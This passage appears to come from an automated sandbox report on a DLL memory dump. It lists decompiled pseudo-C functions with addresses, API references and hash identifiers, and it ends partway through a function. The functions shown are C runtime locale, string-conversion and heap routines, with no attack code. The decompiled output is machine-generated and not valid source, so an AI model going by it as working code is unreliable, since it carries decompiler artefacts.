    • Instruction Fuzzy Hash: 4661C57594864EEFDB10CFA8C841BDABBF6EF09310F1445A9EA54EB384D7709A41CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E215ACA, Relevance: 4.6, APIs: 3, Instructions: 150COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E6E215ACA(void* __ebx, void* __edx, void* __edi, void* __esi, int _a4, char* _a8, int _a12, signed int _a16, int _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				int _v16;
				char _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v44;
				char _v136;
				void* _v140;
				signed int _v144;
				int _v148;
				int _v156;
				intOrPtr _v176;
				signed int _v188;
				char _v208;
				signed int _t64;
				signed int _t66;
				signed int _t77;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t93;
				intOrPtr _t96;
				int _t99;
				signed int _t101;
				int _t106;
				signed int* _t108;
				void* _t109;
				void* _t114;
				int _t120;
				signed int _t123;
				signed int _t125;
				signed int _t126;
				signed int _t130;
				int _t131;
				void* _t133;
				signed int _t134;
				short* _t135;
				signed int _t136;
				signed int _t137;
				void* _t138;
				void* _t139;
				void* _t142;
				signed int _t143;
				short* _t144;

				_t128 = __edx;
				_t64 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t64 ^ _t136;
				_t66 = _a8;
				_t110 = _a4;
				_t108 = _a20;
				_t133 = _a12;
				_t130 = 0;
				_v148 = _a4;
				_v140 = _t133;
				 *_t108 = 0;
				_t147 = _t66 - 1;
				if(_t66 != 1) {
					__eflags = _t66 - 2;
					if(__eflags != 0) {
						__eflags = _t66;
						if(__eflags != 0) {
							goto L20;
						} else {
							_v140 = 0;
							_t66 = E6E213961(_t110, _t133, __eflags, _t133, _a16 | 0x20000000,  &_v140, 2);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L20;
							} else {
								 *_t108 = _v140;
								goto L4;
							}
						}
					} else {
						_t66 = E6E213961(_t110, _t133, __eflags, _t133, _a16, 0, 0);
						_v144 = _t66;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L20;
						} else {
							_t134 = E6E20FB55(_t110, _t66, 2);
							_pop(_t114);
							__eflags = _t134;
							if(__eflags == 0) {
								goto L11;
							} else {
								_t77 = E6E213961(_t114, _t134, __eflags, _v140, _a16, _t134, _v144);
								goto L9;
							}
							goto L41;
						}
					}
					goto L21;
				} else {
					_t80 = E6E2159CF(_t108, __edx, 0, _t133, _t147, _t110, _t133, _a16,  &_v136, 0x80);
					_t139 = _t138 + 0x14;
					_v144 = _t80;
					if(_t80 == 0) {
						_t66 = GetLastError();
						__eflags = _t66 - 0x7a;
						if(__eflags != 0) {
							goto L20;
						} else {
							_t66 = E6E2159CF(_t108, _t128, 0, _t133, __eflags, _v148, _t133, _a16, 0, 0);
							_v144 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								goto L20;
							} else {
								_t134 = E6E20FB55(_t110, _t66, 1);
								__eflags = _t134;
								if(__eflags == 0) {
									L11:
									__eflags = _t130;
								} else {
									_t77 = E6E2159CF(_t108, _t128, 0, _t134, __eflags, _v148, _v140, _a16, _t134, _v144);
									L9:
									__eflags = _t77;
									if(_t77 == 0) {
										goto L11;
									} else {
										_t78 = _t134;
										_t134 = _t130;
										 *_t108 = _t78;
									}
								}
								E6E20FBB2(_t134);
							}
						}
						goto L21;
					} else {
						_t82 = E6E20FB55(_t110, _t80, 1); // executed
						 *_t108 = _t82;
						_t66 = E6E20FBB2(0);
						_t142 = _t139 + 0xc;
						if( *_t108 == 0) {
							L20:
							__eflags = _t66 | 0xffffffff;
							goto L21;
						} else {
							_t118 = _v144;
							_push(_v144 - 1);
							_t85 = E6E21D133(_v144,  *_t108, _t118,  &_v136);
							_t143 = _t142 + 0x10;
							if(_t85 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E208956();
								asm("int3");
								_push(_t136);
								_t137 = _t143;
								_t144 = _t143 - 0x18;
								_t87 =  *0x6e24b164; // 0x1dc3c76f
								_v188 = _t87 ^ _t137;
								_push(_t108);
								_push(_t133);
								_push(0);
								E6E209118(_t108,  &_v208, _t128, _v176);
								_t120 = _v156;
								__eflags = _t120;
								if(_t120 == 0) {
									_t36 = _v28 + 8; // 0xc0b0a09
									_t106 =  *_t36;
									_t120 = _t106;
									_a20 = _t106;
								}
								_t131 = 0;
								__eflags = _a24;
								_t93 = MultiByteToWideChar(_t120, 1 + (0 | _a24 != 0x00000000) * 8, _a8, _a12, 0, 0);
								_v16 = _t93;
								__eflags = _t93;
								if(_t93 != 0) {
									_t109 = _t93 + _t93;
									_t47 = _t109 + 8; // 0xc
									_t123 = _t47;
									__eflags = _t109 - _t123;
									asm("sbb eax, eax");
									__eflags = _t123 & _t93;
									if((_t123 & _t93) == 0) {
										_t135 = 0;
										goto L34;
									} else {
										_t50 = _t109 + 8; // 0xc
										_t125 = _t50;
										__eflags = _t109 - _t125;
										asm("sbb eax, eax");
										_t101 = _t93 & _t125;
										_t51 = _t109 + 8; // 0xc
										_t126 = _t51;
										__eflags = _t101 - 0x400;
										if(_t101 > 0x400) {
											__eflags = _t109 - _t126;
											asm("sbb eax, eax");
											_t135 = E6E20FBEC(_t126, _t101 & _t126);
											__eflags = _t135;
											if(_t135 != 0) {
												 *_t135 = 0xdddd;
												goto L32;
											}
										} else {
											__eflags = _t109 - _t126;
											asm("sbb eax, eax");
											E6E204540();
											_t135 = _t144;
											__eflags = _t135;
											if(_t135 != 0) {
												 *_t135 = 0xcccc;
												L32:
												_t135 =  &(_t135[4]);
												L34:
												__eflags = _t135;
												if(_t135 != 0) {
													E6E2057E0(_t131, _t135, _t131, _t109);
													_t99 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t135, _v16);
													__eflags = _t99;
													if(_t99 != 0) {
														_t131 = GetStringTypeW(_a4, _t135, _t99, _a16);
													}
												}
											}
										}
									}
									E6E2035A7(_t135);
								}
								__eflags = _v20;
								if(_v20 != 0) {
									_t96 = _v32;
									_t60 = _t96 + 0x350;
									 *_t60 =  *(_t96 + 0x350) & 0xfffffffd;
									__eflags =  *_t60;
								}
								__eflags = _v12 ^ _t137;
								return E6E203D51(_v12 ^ _t137);
							} else {
								L4:
								L21:
								return E6E203D51(_v8 ^ _t136);
							}
						}
					}
				}
				L41:
			}


















































    0x6e215aca
    0x6e215ad5
    0x6e215adc
    0x6e215adf
    0x6e215ae2
    0x6e215ae6
    0x6e215aea
    0x6e215aee
    0x6e215af0
    0x6e215af6
    0x6e215afc
    0x6e215afe
    0x6e215b01
    0x6e215be9
    0x6e215bec
    0x6e215c2a
    0x6e215c2c
    0x00000000
    0x6e215c2e
    0x6e215c36
    0x6e215c47
    0x6e215c4c
    0x6e215c4e
    0x00000000
    0x6e215c50
    0x6e215c56
    0x00000000
    0x6e215c56
    0x6e215c4e
    0x6e215bee
    0x6e215bf4
    0x6e215bf9
    0x6e215bff
    0x6e215c01
    0x00000000
    0x6e215c03
    0x6e215c0b
    0x6e215c0e
    0x6e215c0f
    0x6e215c11
    0x00000000
    0x6e215c13
    0x6e215c23
    0x00000000
    0x6e215c23
    0x00000000
    0x6e215c11
    0x6e215c01
    0x00000000
    0x6e215b07
    0x6e215b18
    0x6e215b1d
    0x6e215b20
    0x6e215b28
    0x6e215b70
    0x6e215b76
    0x6e215b79
    0x00000000
    0x6e215b7f
    0x6e215b8b
    0x6e215b93
    0x6e215b99
    0x6e215b9b
    0x00000000
    0x6e215ba1
    0x6e215ba9
    0x6e215bad
    0x6e215baf
    0x6e215bdb
    0x6e215bdb
    0x6e215bb1
    0x6e215bc7
    0x6e215bcf
    0x6e215bcf
    0x6e215bd1
    0x00000000
    0x6e215bd3
    0x6e215bd3
    0x6e215bd5
    0x6e215bd7
    0x6e215bd7
    0x6e215bd1
    0x6e215bdf
    0x6e215be5
    0x6e215b9b
    0x00000000
    0x6e215b2a
    0x6e215b2d
    0x6e215b33
    0x6e215b35
    0x6e215b3a
    0x6e215b3f
    0x6e215c5d
    0x6e215c5d
    0x00000000
    0x6e215b45
    0x6e215b45
    0x6e215b4e
    0x6e215b59
    0x6e215b5e
    0x6e215b63
    0x6e215c71
    0x6e215c72
    0x6e215c73
    0x6e215c74
    0x6e215c75
    0x6e215c76
    0x6e215c7b
    0x6e215c7e
    0x6e215c7f
    0x6e215c81
    0x6e215c84
    0x6e215c8b
    0x6e215c8e
    0x6e215c8f
    0x6e215c90
    0x6e215c97
    0x6e215c9c
    0x6e215c9f
    0x6e215ca1
    0x6e215ca6
    0x6e215ca6
    0x6e215ca9
    0x6e215cab
    0x6e215cab
    0x6e215cb0
    0x6e215cb2
    0x6e215cc9
    0x6e215ccf
    0x6e215cd2
    0x6e215cd4
    0x6e215cda
    0x6e215cdd
    0x6e215cdd
    0x6e215ce0
    0x6e215ce2
    0x6e215ce4
    0x6e215ce6
    0x6e215d32
    0x00000000
    0x6e215ce8
    0x6e215ce8
    0x6e215ce8
    0x6e215ceb
    0x6e215ced
    0x6e215cef
    0x6e215cf1
    0x6e215cf1
    0x6e215cf4
    0x6e215cf9
    0x6e215d14
    0x6e215d16
    0x6e215d20
    0x6e215d23
    0x6e215d25
    0x6e215d27
    0x00000000
    0x6e215d27
    0x6e215cfb
    0x6e215cfb
    0x6e215cfd
    0x6e215d01
    0x6e215d06
    0x6e215d08
    0x6e215d0a
    0x6e215d0c
    0x6e215d2d
    0x6e215d2d
    0x6e215d34
    0x6e215d34
    0x6e215d36
    0x6e215d3b
    0x6e215d52
    0x6e215d58
    0x6e215d5a
    0x6e215d6a
    0x6e215d6a
    0x6e215d5a
    0x6e215d36
    0x6e215d0a
    0x6e215cf9
    0x6e215d6d
    0x6e215d72
    0x6e215d73
    0x6e215d77
    0x6e215d79
    0x6e215d7c
    0x6e215d7c
    0x6e215d7c
    0x6e215d7c
    0x6e215d8e
    0x6e215d98
    0x6e215b69
    0x6e215b69
    0x6e215c60
    0x6e215c70
    0x6e215c70
    0x6e215b63
    0x6e215b3f
    0x6e215b28
    0x00000000

    APIs
    • _free.LIBCMT ref: 6E215BDF
      • Part of subcall function 6E2159CF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 6E215A95
      • Part of subcall function 6E2159CF: __freea.LIBCMT ref: 6E215A9E
    • _free.LIBCMT ref: 6E215B35
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 6E215B70
      • Part of subcall function 6E20FB55: RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000,?,6E20FABB,00000001,00000364,?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B), ref: 6E20FB96
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorHeapLast_free$AllocateByteCharFreeMultiWide__freea
    • String ID:
    • API String ID: 342580553-0
    • Opcode ID: b04136b2a52639f06e1090fdf4bd32819ae58bba81529a214f0b1df9d618800d
    • Instruction ID: e1a7f2d7e835cc1934ab7ef2273e08a11093f16fab83709e0bf62d964ebcfd22
    • Opcode Fuzzy Hash: b04136b2a52639f06e1090fdf4bd32819ae58bba81529a214f0b1df9d618800d
    • Instruction Fuzzy Hash: 10416F7195821EABDF218EA98C54FDB77FEBF45310F1044D5FA19E6280EB318B508BA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21BA6C, Relevance: 4.5, APIs: 3, Instructions: 49COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E6E21BA6C(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t10;
				void* _t15;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t24;

				_t23 = _a4;
				if( *((intOrPtr*)(_t23 + 0xb4)) != 0) {
					_t24 = E6E20FB55(_t15, 1, 0x164);
					_pop(_t17);
					__eflags = _t24;
					if(__eflags != 0) {
						_t8 = E6E21B70B(_t17, __eflags, _t24, _t23); // executed
						__eflags = _t8;
						if(_t8 != 0) {
							 *((intOrPtr*)(_t24 + 0xb0)) = 1;
							_t6 = E6E20FBB2(0);
							goto L8;
						} else {
							E6E21B988(_t24);
							E6E20FBB2(_t24);
							goto L6;
						}
					} else {
						E6E20FBB2(_t7);
						L6:
						_t10 = 1;
					}
				} else {
					_t24 = 0x6e23fde8;
					L8:
					E6E21993F(_t6,  *((intOrPtr*)(_t23 + 0x9c)));
					 *((intOrPtr*)(_t23 + 0x9c)) = _t24;
					_t10 = 0;
				}
				return _t10;
			}










    0x6e21ba73
    0x6e21ba7d
    0x6e21ba92
    0x6e21ba95
    0x6e21ba96
    0x6e21ba98
    0x6e21baa4
    0x6e21baab
    0x6e21baad
    0x6e21bac3
    0x6e21bacd
    0x00000000
    0x6e21baaf
    0x6e21bab0
    0x6e21bab6
    0x00000000
    0x6e21babb
    0x6e21ba9a
    0x6e21ba9b
    0x6e21babc
    0x6e21babe
    0x6e21babe
    0x6e21ba7f
    0x6e21ba7f
    0x6e21bad3
    0x6e21bad9
    0x6e21bade
    0x6e21bae4
    0x6e21bae4
    0x6e21baea

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: cfc101bd9f0d324ef36b48caaea77ff9db152a672b6b0b02c51aadb46ecd3fed
    • Instruction ID: 2be1d695ee94a2e75255992e96f489f276a1d5a61b9d1688ce9000275166b35d
    • Opcode Fuzzy Hash: cfc101bd9f0d324ef36b48caaea77ff9db152a672b6b0b02c51aadb46ecd3fed
    • Instruction Fuzzy Hash: 2CF0213759C31DABF7145BF5A808FC7A2FFDF02739F20041AE20856284DB611A4109E4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E213A21, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
    Download Yara Rule
    C-Code - Quality: 18%
    			E6E213A21(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t7;
				intOrPtr* _t22;
				signed int _t24;

				_t16 = __ecx;
				_push(__ecx);
				_t7 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t7 ^ _t24;
				_t22 = E6E2135C0(0x11, "GetUserDefaultLocaleName", 0x6e2405ec, "GetUserDefaultLocaleName");
				if(_t22 == 0) {
					E6E213B4D(__ebx, _t16, __edi, _t22, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
				} else {
					 *0x6e2211c4(_a4, _a8); // executed
					 *_t22(); // executed
				}
				return E6E203D51(_v8 ^ _t24);
			}







    0x6e213a21
    0x6e213a26
    0x6e213a27
    0x6e213a2e
    0x6e213a48
    0x6e213a4f
    0x6e213a72
    0x6e213a51
    0x6e213a59
    0x6e213a5f
    0x6e213a5f
    0x6e213a85

    APIs
    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,6E21BCFB,?,00000055,00000050), ref: 6E213A6B
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DefaultUser
    • String ID: GetUserDefaultLocaleName
    • API String ID: 3358694519-151340334
    • Opcode ID: 4f415023c610a5615d8305e38bcfe9ee4c6f1bb93c80b6c5c10d14eb7fa80f36
    • Instruction ID: 3470fae2a557baa562fb948877667a93b2fe2ade7a54c795828217d8aa903db3
    • Opcode Fuzzy Hash: 4f415023c610a5615d8305e38bcfe9ee4c6f1bb93c80b6c5c10d14eb7fa80f36
    • Instruction Fuzzy Hash: A2F09A3154410CBBCF05ABA4CD09EEEBFABFB15B20F014054BA1A5A250EA328B50EAD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20227E, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
    Download Yara Rule
    C-Code - Quality: 62%
    			E6E20227E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t19;

				_push(0);
				E6E204493();
				_t16 = __ecx;
				_push(8);
				 *__ecx = 0x6e23b338;
				_t18 = E6E203D05(__ebx, __edx, __ecx, __esi, __eflags);
				if(_t18 == 0) {
					_t18 = 0;
					__eflags = 0;
				} else {
					 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
					_push(1); // executed
					_t9 = E6E201E3A(__ebx); // executed
					 *((intOrPtr*)(_t18 + 4)) = _t9;
				}
				 *((intOrPtr*)(_t16 + 0x34)) = _t18;
				E6E202735(_t16);
				E6E20446D();
				return _t16;
			}







    0x6e20227e
    0x6e202285
    0x6e20228a
    0x6e20228c
    0x6e20228e
    0x6e202299
    0x6e20229e
    0x6e2022b1
    0x6e2022b1
    0x6e2022a0
    0x6e2022a0
    0x6e2022a4
    0x6e2022a6
    0x6e2022ac
    0x6e2022ac
    0x6e2022b5
    0x6e2022b8
    0x6e2022bf
    0x6e2022c4

    APIs
    • __EH_prolog3.LIBCMT ref: 6E202285
    • std::locale::_Init.LIBCPMT ref: 6E2022A6
      • Part of subcall function 6E201E3A: __EH_prolog3.LIBCMT ref: 6E201E41
      • Part of subcall function 6E201E3A: std::_Lockit::_Lockit.LIBCPMT ref: 6E201E4C
      • Part of subcall function 6E201E3A: std::locale::_Setgloballocale.LIBCPMT ref: 6E201E67
      • Part of subcall function 6E201E3A: _Yarn.LIBCPMT ref: 6E201E7D
      • Part of subcall function 6E201E3A: std::_Lockit::~_Lockit.LIBCPMT ref: 6E201EBD
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
    • String ID:
    • API String ID: 3152668004-0
    • Opcode ID: 84593bca0f9de5dacfb6f3a7adbb956e69199f3f66df6179fc0dbd5039734039
    • Instruction ID: 6cefeba041acc1228e5abdfa8268a54ca29de9f32cb8ffd2598ae9ddb87b0d4f
    • Opcode Fuzzy Hash: 84593bca0f9de5dacfb6f3a7adbb956e69199f3f66df6179fc0dbd5039734039
    • Instruction Fuzzy Hash: FEE0DFBAE4562A8FE3124BE8A91079DA26B6B95B28F51482AD4049F2C1CFB08C010B81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2117C5, Relevance: 1.8, APIs: 1, Instructions: 292COMMON
    Download Yara Rule
    C-Code - Quality: 50%
    			E6E2117C5(void* __ebx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24) {
				char _v0;
				char _v4;
				signed int _v8;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char _v52;
				char _v180;
				char _v468;
				signed int _v472;
				signed int* _v476;
				signed int _v480;
				signed int _v484;
				signed short _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr _v500;
				signed int _v504;
				signed int _v524;
				intOrPtr _v568;
				signed int _v588;
				signed int _v592;
				void* __ebp;
				signed int _t97;
				void* _t100;
				signed int _t102;
				signed int _t104;
				char _t108;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				signed int _t134;
				signed short _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				char* _t147;
				signed int _t148;
				intOrPtr _t151;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t161;
				signed int _t165;
				signed int* _t166;
				void* _t168;
				void* _t174;
				signed int _t176;
				intOrPtr* _t180;
				signed int _t184;
				intOrPtr* _t185;
				signed int _t187;
				signed int _t191;
				void* _t192;
				signed int _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t182 = __edx;
				_t97 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t97 ^ _t195;
				_push(__ebx);
				_t161 = _a24;
				_push(__esi);
				_t191 = _a4;
				_v492 = _a8;
				_v496 = _t161;
				_push(__edi);
				_t184 = _a16;
				_v480 = _t184;
				if(_t191 != 0) {
					_t100 = E6E20FA06(_t161, _t168, __edx);
					_push(0x55);
					_t10 = _t100 + 0x68; // 0x68
					_v476 = _t10;
					_t12 = _t100 + 0x6c; // 0x6c
					_v484 = _t12;
					_t14 = _t100 + 0x172; // 0x172
					_v472 = _t14;
					_t172 = 0;
					_v500 = _t100 + 0x2a0;
					_v504 = 0;
					_v488 = 0;
					_t102 = E6E21BC2D(0, _t184, _a20, _t100 + 0x2a0);
					_t199 = _t198 + 0x10;
					__eflags = _t102;
					if(_t102 != 0) {
						L38:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						goto L63;
					} else {
						__eflags =  *_t191 - 0x43;
						if( *_t191 != 0x43) {
							L10:
							_t187 = _t191;
							_t182 = 0;
							__eflags = 0;
							_t174 = _t187 + 2;
							do {
								_t123 =  *_t187;
								_t187 = _t187 + 2;
								__eflags = _t123;
							} while (_t123 != 0);
							_t184 = _t187 - _t174 >> 1;
							__eflags = _t184 - 0x83;
							if(_t184 >= 0x83) {
								L29:
								_t124 = E6E213C9B();
								__eflags = _t124;
								_t165 = 0 | _t124 == 0x00000000;
								_t126 = E6E211667(_t165,  &_v468, _t191);
								_pop(_t172);
								__eflags = _t126;
								if(__eflags != 0) {
									_t166 = _v476;
									goto L40;
								} else {
									_t147 =  &_v468;
									__eflags = _t165;
									_t166 = _v476;
									_push(_t147);
									_push(_t166);
									_push(_t147);
									if(_t165 == 0) {
										_t148 = E6E21C3CB(_t166, _t172, _t182, _t184, _t191); // executed
									} else {
										_t148 = E6E21CD03(_t166, _t172, _t182, _t184, _t191);
									}
									_t199 = _t199 + 0xc;
									__eflags = _t148;
									if(__eflags == 0) {
										L40:
										__eflags = E6E213AEA(_t172, _t191, __eflags, _t191);
										if(__eflags == 0) {
											_t161 = _v480;
											_t191 = 0;
											__eflags = 0;
											_t176 = _t161;
											_t182 = _t176 + 2;
											do {
												_t128 =  *_t176;
												_t176 = _t176 + 2;
												__eflags = _t128;
											} while (_t128 != 0);
											_t172 = _t176 - _t182 >> 1;
											_push((_t176 - _t182 >> 1) + 1);
											_t130 = E6E21BC2D(_t176 - _t182 >> 1, _v500, 0x55, _t161);
											_t199 = _t199 + 0x10;
											__eflags = _t130;
											if(_t130 == 0) {
												goto L1;
											} else {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												goto L63;
											}
										} else {
											_t134 = E6E213961(_t172, _t191, __eflags, _t191, 0x20001004,  &_v488, 2);
											__eflags = _t134;
											if(_t134 == 0) {
												L43:
												_t135 = GetACP();
												_v488 = _t135;
											} else {
												_t135 = _v488;
												__eflags = _t135;
												if(_t135 == 0) {
													goto L43;
												}
											}
											 *_t166 = _t135 & 0x0000ffff;
											_t161 = _t184 + 1;
											_push(_t161);
											_t137 = E6E21BC2D(_t172, _v472, 0x83, _t191);
											_t199 = _t199 + 0x10;
											__eflags = _t137;
											if(_t137 != 0) {
												goto L38;
											} else {
												_push(_t161);
												_t138 = E6E21BC2D(_t172, _v480, _a20, _t191);
												_t199 = _t199 + 0x10;
												__eflags = _t138;
												if(_t138 != 0) {
													goto L38;
												} else {
													_push(_t161);
													_push(_t191);
													_push(0x55);
													_push(_v500);
													goto L47;
												}
											}
										}
									} else {
										_push( &_v468);
										E6E2115F7(_t166, _t172, _v472, 0x83);
										_t161 = _v480;
										_t199 = _t199 + 0xc;
										__eflags = _t161;
										if(_t161 == 0) {
											L48:
											_t161 = 0;
											__eflags =  *_t191;
											if( *_t191 == 0) {
												L52:
												_t172 = 0;
												__eflags = 0;
												 *_v484 = 0;
												goto L53;
											} else {
												_t172 = 0x83;
												__eflags = _t184 - 0x83;
												if(_t184 >= 0x83) {
													goto L52;
												} else {
													_push(_t184 + 1);
													_t146 = E6E21BC2D(0x83, _v484, 0x83, _t191);
													_t199 = _t199 + 0x10;
													__eflags = _t146;
													if(_t146 == 0) {
														L53:
														_t161 = _v496;
														goto L54;
													} else {
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														goto L63;
													}
												}
											}
										} else {
											_t180 =  &_v180;
											_t182 = _t180 + 2;
											do {
												_t151 =  *_t180;
												_t180 = _t180 + 2;
												__eflags = _t151 - _v504;
											} while (_t151 != _v504);
											_t172 = _t180 - _t182 >> 1;
											_push((_t180 - _t182 >> 1) + 1);
											_push( &_v180);
											_push(_a20);
											_push(_t161);
											L47:
											_t139 = E6E21BC2D(_t172);
											_t199 = _t199 + 0x10;
											__eflags = _t139;
											if(_t139 != 0) {
												goto L38;
											} else {
												goto L48;
											}
										}
									}
								}
							} else {
								_t154 = _v472;
								_t172 = _t191;
								while(1) {
									_t182 =  *_t154;
									__eflags = _t182 -  *_t172;
									if(_t182 !=  *_t172) {
										break;
									}
									__eflags = _t182;
									if(_t182 == 0) {
										L18:
										_t155 = 0;
									} else {
										_t182 =  *((intOrPtr*)(_t154 + 2));
										__eflags = _t182 -  *((intOrPtr*)(_t172 + 2));
										if(_t182 !=  *((intOrPtr*)(_t172 + 2))) {
											break;
										} else {
											_t154 = _t154 + 4;
											_t172 = _t172 + 4;
											__eflags = _t182;
											if(_t182 != 0) {
												continue;
											} else {
												goto L18;
											}
										}
									}
									L20:
									__eflags = _t155;
									if(_t155 == 0) {
										L54:
										__eflags = _t161;
										if(_t161 != 0) {
											 *_t161 =  *_v476;
										}
										_t161 = _v472;
										_t191 = _v492;
										_t141 = E6E20D69C(_t191, _a12, _t161);
										_t199 = _t199 + 0xc;
										__eflags = _t141;
										if(_t141 != 0) {
											goto L38;
										} else {
											goto L2;
										}
									} else {
										_t156 = _v484;
										_t172 = _t191;
										while(1) {
											_t182 =  *_t156;
											__eflags = _t182 -  *_t172;
											if(_t182 !=  *_t172) {
												break;
											}
											__eflags = _t182;
											if(_t182 == 0) {
												L26:
												_t157 = 0;
											} else {
												_t182 =  *((intOrPtr*)(_t156 + 2));
												__eflags = _t182 -  *((intOrPtr*)(_t172 + 2));
												if(_t182 !=  *((intOrPtr*)(_t172 + 2))) {
													break;
												} else {
													_t156 = _t156 + 4;
													_t172 = _t172 + 4;
													__eflags = _t182;
													if(_t182 != 0) {
														continue;
													} else {
														goto L26;
													}
												}
											}
											L28:
											__eflags = _t157;
											if(_t157 == 0) {
												goto L54;
											} else {
												goto L29;
											}
											goto L75;
										}
										asm("sbb eax, eax");
										_t157 = _t156 | 0x00000001;
										__eflags = _t157;
										goto L28;
									}
									goto L75;
								}
								asm("sbb eax, eax");
								_t155 = _t154 | 0x00000001;
								__eflags = _t155;
								goto L20;
							}
						} else {
							_t184 = 0;
							__eflags =  *(_t191 + 2);
							if( *(_t191 + 2) != 0) {
								goto L10;
							} else {
								_t191 = _v492;
